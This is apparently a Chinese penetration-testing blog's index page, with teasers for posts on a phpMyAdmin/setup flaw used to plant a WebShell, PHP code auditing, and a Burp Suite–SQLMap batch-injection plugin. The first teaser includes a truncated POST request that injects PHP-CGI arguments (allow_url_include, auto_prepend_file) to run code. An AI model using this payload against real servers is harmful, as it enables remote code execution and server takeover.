欢迎来到【血梦博客】 今天是:2020年10月29日 星期四
站长联系QQ:635948183

  • phpMyAdmin/setup漏洞

    phpMyAdmin/setup漏洞

    phpMyAdmin/setup漏洞写入WebShell 利用php配置漏洞,执行php代码进而执行系统命令 (可利用Burpsuite发送POST) POST http://192.168.2.101/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dp...

    阅读全文 作者:血梦 日期:2020-07-14 分类: 渗透测试

  • PHP代码审计之入门实战

    PHP代码审计之入门实战

    PHP代码审计之入门实战系统介绍 CMS名称:新秀企业网站系统PHP版 官网:www.sinsiu.com 版本:这里国光用的1.0 正式版 (官网最新的版本有毒,网站安装的时候居然默认使用远程数据库???迷之操作 那站长的后台密码岂不是直接泄露了?疑似远程...

    阅读全文 作者:血梦 日期:2020-02-10 分类: 代码审计

  • Burpsuit结合SQLMapAPI产生的批量注入插件

    Burpsuit结合SQLMapAPI产生的批量注入插件

    Burpsuit结合SQLMapAPI产生的批量注入插件前言 前辈们的功劳是无限大的。 PHP是世界上最好用的语言,没有之一。 出发点 一个网站是由多个开发人员协同工作完成的,他们遵循一定的命名规范(模块+动词+名称)等。在对一个网站进行测试的时候,你检查了A0001-A0050接口时,发现过滤很完整。这时...

    阅读全文 作者:血梦 日期:2018-05-03 分类: 神兵利器

关灯